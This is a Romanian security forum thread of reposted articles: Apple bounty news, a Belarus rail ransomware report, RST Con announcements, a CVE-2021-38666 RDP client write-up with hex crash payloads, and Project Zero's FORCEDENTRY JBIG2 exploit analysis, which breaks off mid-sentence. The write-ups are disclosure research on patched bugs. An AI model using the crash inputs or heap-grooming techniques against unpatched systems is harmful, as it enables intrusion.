of how a design flaw in one application can enable a variety of other, unrelated, bugs to become more dangerous. It was also great example of how even with macOS Gatekeeper enabled, an attacker can still achieve a lot of mischief by tricking approved apps into doing malicious things. I submitted these bugs to Apple in mid July 2021. They patched all issues in early 2022 and rewarded me $100,500 as a bounty. Sursa: https://www.ryanpickren.com/safari-uxss
-
- 2
-
Apple pays record $100,500 to student who found Mac webcam hack William Gallagher | Jan 25, 2022 0 Comments AppleInsider is supported by its audience and may earn commission as an Amazon Associate and affiliate partner on qualifying purchases. These affiliate partnerships do not influence our editorial content. A cyber security student has shown Apple how hacking its Mac webcams can then also leave devices fully open to hackers, earning him $100,500 from the company's bug bounty program. Ryan Pickren, who previously discovered an iPhone and Mac camera vulnerability, has been awarded what is believed to be Apple's largest bug bounty payout. According to Pickren, the new webcam vulnerability concerned a series of issue with Safari and iCloud that he says Apple has now fixed. Before it was patched, a malicious website could launch an attack using these flaws. In his full account of the exploit, Pickren explains it would give the attacker full access to all web-based accounts, from iCloud to PayPal, plus permission to use the microphone, camera, and screensharing. If the camera were used, however, its regular green light would still come on as normal. Pickren reports that the same hack would ultimately mean that an attacker could gain full access to a device's entire filesystem. It would do so by exploiting Safari's "webarchive" files, the system the browser uses to save local copies of websites. "A startling feature of these files is that they specify the web origin that the content should be rendered in," writes Pickren. "This is an awesome trick to let Safari rebuild the context of the saved website, but as the Metasploit authors pointed out back in 2013, if an attacker can somehow modify this file, they could effectively achieve UXSS [universal cross-site scripting] by design." A user has to download such a webarchive file, and then also open it. According to Pickren, this meant Apple did not consider this a realistic hack scenario when it first implemented Safari's webarchive. "Granted this decision was made nearly a decade ago, when the browser security model wasn't nearly as mature as it is today," says Pickren. Tightening security "Prior to Safari 13, no warnings were even displayed to the user before a website downloaded arbitrary files," he continued. "So planting the webarchive file was easy." Apple has not commented on the bug, nor is it known if it has been actively exploited. But Apple has paid Pickren $100,500 from its bug bounty program, $500 more than previously reported pay outs. The bug bounty program can officially award up to $1 million, and the company publishes a list of maximum sums per category of security issue reported. There is no requirement for security experts to publicly disclose how much they've been awarded. So it's possible that Apple has paid out more than Pickren's $100,500. However, the company has previously been greatly criticized for paying less than its own maximums, as well as for being slow to patch reported bugs. Sursa: https://appleinsider.com/articles/22/01/25/apple-pays-record-100500-to-student-who-found-mac-webcam-hack
-
- 1
-
Un grup de hackeri pretinde că a perturbat transportul trupelor ruseşti spre Ucraina, prin Belarus, în urma infectării cu ransomware a serverelor folosite de sistemul feroviar din Belarus. Belarusian Cyber-Partisans, grup de hackeri care se opune regimului Lukashenko, pe care-l şi numesc terorist, a anunţat pe Twitter să a atacat şi compromis cu ransomware sistemul naţional de cale ferată din Belarus. Aceştia spun că au reuşit să cripteze un număr semnificativ de servere şi au distrus backup-urile pentru a încetini şi chiar a întrerupe transportul trupelor ruseşti pe calea ferată. Experţii în securitate nu au confirmat atacul, însă, spun că primele indicii arată, într-adevăr, că cineva a pătruns în reţeaua BelZhD şi că este prima oară când ransomware-ul este folosit într-o astfel de manieră. Mai multe site-uri ale BelZhD nu funcţionează în prezent, afectând diverse servicii publice, precum achiziţionarea online a biletelor. Conform mai multor surse, Rusia transportă trupe spre Ucraina, prin Belarus, către graniţa dintre cele două ţări. Oficialii din Belarus susţin că mutarea trupelor are loc în vederea unui exerciţiu militar comun. Sursa: https://adevarul.ro/international/europa/hackerii-atacat-ransomware-sistemul-feroviar-belarus-opri-transportul-trupelor-rusesti-granita-belarus-ucraina-1_61ef88e25163ec42711dae02/index.html
-
- 4
-
Salut, RST Con #2 va avea loc in zilele de 16-17 martie 2022. In aceeasi perioada va avea loc si RST Con CTF #2. Astfel, persoanele interesate de createa unui exercitiu pentru CTF sunt rugate sa ma contacteze prin mesaj privat sau la contact@rstcon.com Exercitiile pot fi de orice nivel si pot acoperi orice ramura a "security"-ului. Daca sunt necesare VPS-uri le veti primi cu ceva timp inainte de CTF. Intre timp voi lucra la https://rstcon.com , platforma CTF si alte lucruri necesare. De asemenea, vrem sa oferim ca si anul trecut premii castigatorilor. Daca exista persoane care pot dona pentru CTF, astept sa ma contactati. Daca aveti intrebari sau sugestii, le astept aici. Thanks!
-
Salut, Din moment ce primavara nu sunt multe conferinte, am decis ca ar fi o perioada ideala pentru RST Con #2. Conferinta va fi online, gratuita si in limba romana. Detalii: https://rstcon.com/ Date conferinta: 17-18 martie 2022 (joi si vineri) Events: Linkedin: https://www.linkedin.com/events/rstcon-26894664423269556224/about/ Facebook: https://www.facebook.com/events/312925840851762/ Inregistrare (Zoom): - Prima zi (17 martie): https://us02web.zoom.us/webinar/register/7716432416217/WN_ihd6n-QbT9SmhUFEEiOouw - A doua zi (18 martie): https://us02web.zoom.us/webinar/register/8216433285169/WN_FvmdS_d2SJSo-OJpFaNRMA Call for papers: https://rstcon.com/call-for-papers/ CTF: https://rstcon.com/ctf/ Lucrez in continuare la lucrurile necesare (e.g. platforma CTF). Thanks!
-
Salut, nu stiu daca se poate gasi, dar poti cere cateva unor prieteni daca lucrezi la un proiect personal.
-
Pe 20 am deja planificata o alta iesire la bere, sa vad cum e vremea la munte pentru sambata, daca plec iar...
-
Pe 22, in weekend? Eu in principiu as putea in timpul saptamanii, in weekenduri de obicei sunt plecat din oras (la partie, daca se baga careva )
-
In ziua de azi efectiv nu merita sa faci ceva ilegal. Poti castiga bine legal. Primul pas e sa descoperi ceva ce iti place sa faci.
-
Sunt mai multe solutii online dar nu par sa functioneze prea bine. Solutia ar fi manuala, sa inlocuiesti anumite apeluri de functii cu "document.write" sau o alta metoda care in loc sa execute sa afiseze ce umreaza sa execute. Codul este destul de mare si complex, ar dura ceva dar nu e tocmai imposibil.
-
Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666) This is the third installment in my three-part series of articles on fuzzing Microsoft’s RDP client, where I explain a bug I found by fuzzing the smart card extension. MSRC Report: RDP Client Information Disclosure Vulnerability (CVE-2021-38666) CVSS 8.8 (Critical) Other articles in this series: Fuzzing Microsoft’s RDP Client using Virtual Channels: Overview & Methodology Remote ASLR Leak in Microsoft’s RDP Client through Printer Cache Registry (CVE-2021-38665) Remote Deserialization Bug in Microsoft’s RDP Client through Smart Card Extension (CVE-2021-38666) Table of Contents Introduction Fuzzing RDPDR, the File System Virtual Channel Extension Analyzing crashes Smart Cards and RPC The RPC NDR marshaling engine Root cause Heap corruption Exploitation Reporting to Microsoft Disclosure Timeline Introduction The Remote Desktop Protocol (RDP) is a proprietary protocol designed by Microsoft which allows the user of an RDP client software to connect to a remote computer over the network with a graphical interface. Its use around the world is very widespread; some people, for instance, use it often for remote work and administration. Most of vulnerability research is concentrated on the RDP server. However, some critical vulnerabilities have also been found in the past in the RDP client, which would allow a compromised server to attack a client that connects to it. At Blackhat Europe 2019, a team of researchers showed they found an RCE in the RDP client. Their motivation was that North Korean hackers would alledgely carry out attacks through RDP servers acting as proxies, and that you could hack them back by setting up a malicious RDP server to which they would connect. During my internship at Thalium, I spent time studying and reverse engineering Microsoft RDP, learning about fuzzing, and looking for vulnerabilities. In this article, I will explain how I found a deserialization bug in the Microsoft RDP client, but for which I unfortunately couldn’t provide an actual proof of concept. If you are interested in details about the Remote Desktop Protocol, reversing the Microsoft RDP client or fuzzing methodology, I invite you to read my first article which tackles these subjects. Either way, I will briefly provide some context required to understand this article: The target is Microsoft’s official RDP client on Windows 10. Executable is mstsc.exe (in system32), but the main DLL for most of the client logic is mstscax.dll. RDP uses the abstraction of virtual channels, a layer for transporting data. For instance, the channel RDPSND is used for audio redirection, and the channel CLIPRDR is used for clipboard synchronization. Each channel behaves according to separate logic and its own protocol, which official specification can often be found in Microsoft docs. Virtual channels are a great attack surface and a good entrypoint for fuzzing. I fuzzed virtual channels with a modified version of WinAFL and a network-level harness. Fuzzing RDPDR, the File System Virtual Channel Extension RDPDR is the name of the static virtual channel which purpose is to redirect access from the server to the client file system. It is also the base channel that hosts several sub-extensions such as the smart card extension, the printing extension or the serial/parallel ports extension. RDPDR is one of the few channels that are opened by default in the RDP client, alongside other static channels RDPSND, CLIPRDR, DRDYNVC. This makes it an even more interesting target risk-wise. Microsoft has some nice documentation on this channel. It contains the different PDU types, their structures, and even dozens of examples of PDUs which is great for seeding our fuzzer. Fuzzing RDPDR yielded a few small bugs, as well as another bug for which I got a CVE (see my previous article: Remote ASLR Leak in Microsoft’s RDP Client through Printer Cache Registry). The bug detailed in this article is one of the denser bugs I’ve had to deal with among my RDP findings. It was found by analyzing crashes that I got during fuzzing. It may sound obvious, but it’s actually not; for instance, the previous vulnerability I found had no crash associated to it Analyzing crashes The crashes happened while fuzzing the Smart Card sub-protocol, and were quite… enigmatic. Perplexing logs of crashes while fuzzing RDPDR There were a lot of crashes, in many different modules, and also (not showed on screenshot) in mstscax.dll. In fact, there were way too many crashes at random places for all of this to make any sense, so I thought something was broken with my fuzzing. Although, one crash seemed to reoccur more frequently inside RPCRT4.DLL. We’ve gotten a tiny glimpse of RPC while investigating DRDYNVC in the first article, but it’s gonna get more serious now. Smart Cards and RPC The crashes in RPCRT4.DLL arise in NdrSimpleTypeConvert+0x307: mov eax, [rdx] ; crash bswap eax mov [rdx], eax It’s a classic out-of-bounds read on what seems to be the byteswap of a DWORD in the heap. Fortunately, we are able to find the associated payload and instantly reproduce the bug. Here’s what the call stack looks like when the crash occurs: Call stack at time of the crash in RPCRT4.DLL So before entering RPCRT4.DLL, we were in mstscax!W32SCard::LocateCardsByATRA. But actually, if we also analyze other payloads that lead to the same crash, the call stack will interestingly point out other functions in mstscax.dll, such as: W32SCard::HandleContextAndTwoStringCallWithLongReturn W32SCard::WriteCache W32SCard::DecodeContextAndStringCallW … What’s with all of these? Here’s one thing all these functions have in common: the following snippet of code. v6 = MesDecodeBufferHandleCreate( &PDU->InputBuffer, PDU->InputBufferLength, &pHandle ); // ... NdrMesTypeDecode3( pHandle, &pPicklingInfo, &pProxyInfo, (const unsigned int **)&ArrTypeOffset, 0xEu, &pObject ); // Crash here The only thing that varies across these functions is the fifth parameter of NdrMesTypeDecode3 (the 0xE). We also immediately notice that PDU->InputBufferLength (DWORD) can be arbitrarily large… Before going any further, let’s dissect two of the guilty payloads as well. rpc-crash-1 72 44 52 49 01 00 00 00 f8 01 02 00 08 00 00 00 0e 00 00 00 00 00 00 00 DeviceIoRequest 00 40 00 00 OutputBufferLength 00 80 2d 00 InputBufferLength e8 00 09 00 IoControlCode 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 08 00 Padding InputBuffer 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 03 00 08 00 01 40 00 00 16 00 00 00 01 00 00 00 rpc-crash-2 72 44 52 49 01 00 00 00 f8 00 00 00 04 10 00 00 0e 00 00 00 00 00 00 00 DeviceIoRequest 00 40 00 00 OutputBufferLength 6f 63 06 00 InputBufferLength 64 00 09 00 IoControlCode 00 00 ff 00 00 00 00 40 00 20 00 66 00 00 77 66 64 63 08 00 Padding InputBuffer 01 00 00 00 00 00 00 00 00 00 00 04 00 00 00 0e 00 00 00 00 00 00 00 00 40 00 00 6f 63 06 00 64 00 09 00 00 00 ff 00 00 00 00 40 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 00 00 05 So those are Device I/O Request PDUs, more specifically of sub-type Device Control Request. We already met one in the first article, in the arbitrary malloc bug. But what is this IoControlCode field exactly? According to the specification: IoControlCode (4 bytes): A 32-bit unsigned integer. This field is specific to the redirected device. Specific to the redirected device… For some reason, it took me a long time to realize there was actually a dedicated specification for the Smart Card sub-protocol (as well as the others). The section 3.1.4 of the Smart Card specification answers our suspicion. It contains a long table that maps IoControlCode values with types of IRP_MJ_DEVICE_CONTROL requests and associated structures. Therefore, there are around 60 functions that contain the same pattern of code using MesDecodeBufferHandleCreate followed by NdrMesTypeDecode3. They are all called the same way with our InputBuffer and InputBufferLength — only a certain offset parameter varies each time. According to the specification, for IoControlCode set to 0x000900E8, we get the following LocateCardsByATRA_Call structure: typedef struct _LocateCardsByATRA_Call { REDIR_SCARDCONTEXT Context; [range(0,1000)] unsigned long cAtrs; [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks; [range(0,10)] unsigned long cReaders; [size_is(cReaders)] ReaderStateA* rgReaderStates; } LocateCardsByATRA_Call; It seems then that based on IoControlCode, our input buffer will be decoded according to a certain structure. The RPC NDR marshaling engine Let’s come back on the decoding piece of code: v6 = MesDecodeBufferHandleCreate( &PDU->InputBuffer, PDU->InputBufferLength, &pHandle ); This function from RPCRT4 is documented by Microsoft: The MesDecodeBufferHandleCreate function creates a decoding handle and initializes it for a (fixed) buffer style of serialization. So this is what it is all about… RPC has its own serialization engine, called the NDR marshaling engine (Network Data Representation). In particular, there is documentation on how data serialization works: header, format strings, types, etc. The RDP client makes “manual” use of the RPC NDR serialization engine to decode structures from the PDUs. After having initialized the decoding handle with the input buffer and length, the data is effectively deserialized: NdrMesTypeDecode3( pHandle, &pPicklingInfo, &pProxyInfo, (const unsigned int **)&ArrTypeOffset, 0xEu, &pObject ); And to our surprise… the function NdrMesTypeDecode3 is nowhere to be documented! The reason is because developers are not supposed to use this function directly. Instead, one should describe structures using Microsoft’s IDL (Interface Description Language). Next, the MIDL compiler should be used to generate stubs that can encode and decode data (using the NdrMes functions underneath). Nonetheless, header files contain information about the parameters and their types that can help us understand a bit more. Interesting fields inside NdrMesTypeDecode3's arguments... (pProxyInfo) In particular, the pProxyInfo argument eventually leads to a Format field. It seems to contain a compiled description of all the types that exist and are used within the Smart Card extension. Then, the ArrTypeOffset array, which starts like this: 0x02, 0x1e, 0x1e, 0x54, ..., lists the offsets of all the structures of interest inside the compiled format string. The next argument (0xE) is the offset, in the ArrTypeOffset array, of the structure we want to consider. For LocateCardsByATRA, 0xE gives an offset of 0x220 in the ArrTypeOffset array, which points to the compiled format associated to the structure we found earlier in the specification: typedef struct _LocateCardsByATRA_Call { REDIR_SCARDCONTEXT Context; [range(0,1000)] unsigned long cAtrs; [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks; [range(0,10)] unsigned long cReaders; [size_is(cReaders)] ReaderStateA* rgReaderStates; } LocateCardsByATRA_Call; We are lucky the specification tells us everything about the type structures, and even releases the full IDL in appendix. If we didn’t have these, we would have had to decompile the format ourselves, and not only the format pointed by the offset we found. Indeed, there are also many references to other previously defined structures, such as LocateCards_ATRMask. Root cause This may be getting a bit hard to follow, so let’s summarize what we understand for now: We can send an IoControlCode, InputBuffer and InputBufferLength. The InputBufferLength (DWORD) can be greater than the actual length of InputBuffer. The input buffer will be deserialized (through the RPC NDR marshaling engine) according to a structure that varies with IoControlCode. There are around 60 possible IoControlCode values, and thus decoding structures. There’s an OOB read during the deserialization process, in a certain function NdrSimpleTypeConvert. Now as I was reversing and debugging, it seemed to me that these “convert” operations actually took place before any real decoding per se. It was as if before deserializing, there was a first pass on the whole buffer to convert stuff. I eventually found a Windows XP source leak that helped shed light on all of this: void NdrSimpleTypeConvert(PMIDL_STUB_MESSAGE pStubMsg, uchar FormatChar) { switch (FormatChar) { // ... case FC_ULONG: ALIGN(pStubMsg->Buffer,3); CHECK_EOB_RAISE_BSD( pStubMsg->Buffer + 4 ); if ((pStubMsg->RpcMsg->DataRepresentation & NDR_INT_REP_MASK) != NDR_LOCAL_ENDIAN) { *((ulong *)pStubMsg->Buffer) = RtlUlongByteSwap(*(ulong *)pStubMsg->Buffer); } pStubMsg->Buffer += 4; break; // ... } } The magic happens when the endianness of the serialized data does not match with the local endianness. A pass on the buffer is performed to switch the endianness of (in particular) all the FC_ULONG type fields (the unsigned long fields in our structure). Therefore, in the _LocateCardsByATRA_Call structure, the fields cAtrs and cReaders are byteswapped. But also and more importantly, any unsigned long that lies inside the nested rgAtrMasks or rgReaderStates fields will be byteswapped. And these fields are arrays of structs which size we control! So there are actually two kinds of overruns here: the user-supplied PDU->InputBufferLength is not properly checked, so the conversion pass in the RPC NDR deserialization will go way beyond the end of the PDU in the heap; the user-supplied cAtrs (or cReaders) that is coded inside the serialized data can be large enough to make the deserialization structure overflow the actual length of the buffer, along with the input buffer length we provided. Combined, these overruns result in an out-of-bounds read in the heap, and thus a crash. Heap corruption We managed to clear up why we got crashes in RPCRT4.DLL, and which payloads triggered them. However, we haven’t found yet an explanation to the tons of other nonsensical crashes we’ve had. Let’s check the LocateCards_ATRMask structure, that is nested inside LocateCardsByATRA_Call: typedef struct _LocateCards_ATRMask { [range(0, 36)] unsigned long cbAtr; byte rgbAtr[36]; byte rgbMask[36]; } LocateCards_ATRMask; There’s an unsigned long field (cbAtr) at the beginning of this struct of total size 76 bytes. Therefore, we may be able to perform byteswaps of DWORDs in the heap every 76 bytes! We can confirm this by setting a breakpoint where the byteswap occurs and watching the heap progressively getting disfigured. Since the PDU->InputBufferLength variable is arbitrarily large, we can, as we said, eventually reach the end of the heap segment to cause an OOB read crash. But this is not the interesting thing here. By byteswapping DWORDs in the heap, we are corrupting a lot of objects. If the input buffer length is large enough to allow out-of-bounds operations, but small enough not to exceed the heap segment, the deserialization process will return with a damaged heap. This leads to numerous types of crashes; all the odd unexplained crashes that I encountered earlier. Heap Corruption exceptions during heap management calls Random pointers being damaged and causing access violations Damaged vtable pointers causing access violations Damaged vtable pointers that still successfully resolve and redirect the execution flow, of course directly crashing after (illegal instruction) The “unknown module” crashes I found earlier! Exploitation I suspect some of these behaviors could be exploited to achieve unexpected harmful results such as remote code execution. For instance, I thought that with some heap spray, one could manage to hijack a vtable through a well-aligned byteswap and redirect the execution flow. But it seemed quite tricky to carry out and I did not manage to exploit it myself. There may also be other repercussions of this deserialization bug. I saw that there were other kinds of conversions that could be performed: float conversions, EBCDIC <-> ASCII… but I’m not sure whether it is actually possible to trigger them. Reporting to Microsoft At first, I was hesitant about whether I should report this to MSRC or not. Indeed, I was very unsure about this bug’s exploitability, which seemed to me like it would be very intricate and relying on a lot of luck. Moreover, by submitting it, I would have to tag it as Remote Code Execution, which I thought would be a bold move without any proof of concept. I still reported it to MSRC, and rightfully so, as it was assessed Remote Code Execution with Critical severity and awarded a $5,000 bounty! In conclusion, don’t be afraid to submit bugs even if you lack proof of exploitation. As long as you have a very detailed explanation of the bug, a good understanding of the root cause and a decent analysis of the risks that come with it, it can be acknowledged and awarded. The exploitation process can sometimes require a lot of skill and creativity, and you can always tell yourself that even if you can’t exploit your own bug, there may be an evil super hacker out there that would manage to exploit it — better be safe than sorry. Disclosure Timeline 2021-07-22 — Sent vulnerability report to MSRC (Microsoft Security Response Center) 2021-07-23 — Microsoft started reviewing and reproducing 2021-07-31 — Microsoft acknowledged the vulnerability and started developing a fix. They also started reviewing this case for a potential bounty award. 2021-08-04 — Microsoft assessed the vulnerability as Remote Code Execution with Important severity. Bounty award: $5,000. 2021-08-13 — The vulnerability was assigned CVE-2021-38666. 2021-11-09 — Microsoft released the security patch. For some reason, the severity was revised to Critical when the CVE was published. 2021-12-10 by Valentino Ricotta Sursa: https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/
-
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution Posted by Ian Beer & Samuel Groß of Google Project Zero We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research. Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works. Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states. The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860. NSO NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities. For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regime, hacking of human rights defenders in Morocco and Bahrain, the targeting of Amnesty International staff and dozens of other cases. Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent." Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out. From One to Zero In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages: Screenshots of Phishing SMSs reported to Citizen Lab in 2016 source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense. One weird trick The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username. iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif: [IMGIFUtils copyGifFromPath:toDestinationPath:error] Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file. The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code. Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor. A PDF in your GIF NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser. PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser... Extreme compression In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white. It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it. A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2 for its scan-to-pdf functionality source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit: Technique 1: Segmentation and substitution Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same: Simple pattern matching can find all the shapes which look similar on a page, in this case all the 'e's JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them: Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations. There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore. Technique 2: Refinement coding As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode. It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle: Using the XOR operator on bitmaps to compute a difference image In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression. Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas. A JBIG2 stream Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available. The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page. Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict. A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas. A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs. JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially. The vulnerability The vulnerability is a classic integer overflow when collating referenced segments: Guint numSyms; // (1) numSyms = 0; for (i = 0; i < nRefSegs; ++i) { if ((seg = findSegment(refSegs[i]))) { if (seg->getType() == jbig2SegSymbolDict) { numSyms += ((JBIG2SymbolDict *)seg)->getSize(); // (2) } else if (seg->getType() == jbig2SegCodeTable) { codeTables->append(seg); } } else { error(errSyntaxError, getPos(), "Invalid segment reference in JBIG2 text region"); delete codeTables; return; } } ... // get the symbol bitmaps syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3) kk = 0; for (i = 0; i < nRefSegs; ++i) { if ((seg = findSegment(refSegs[i]))) { if (seg->getType() == jbig2SegSymbolDict) { symbolDict = (JBIG2SymbolDict *)seg; for (k = 0; k < symbolDict->getSize(); ++k) { syms[kk++] = symbolDict->getBitmap(k); // (4) } } } } numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value. That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer. Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer. Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4). Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption. A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap Boundless unbounding Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render). JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line. The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff. This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer. The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields: The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory By rendering 4-byte bitmaps at the correct 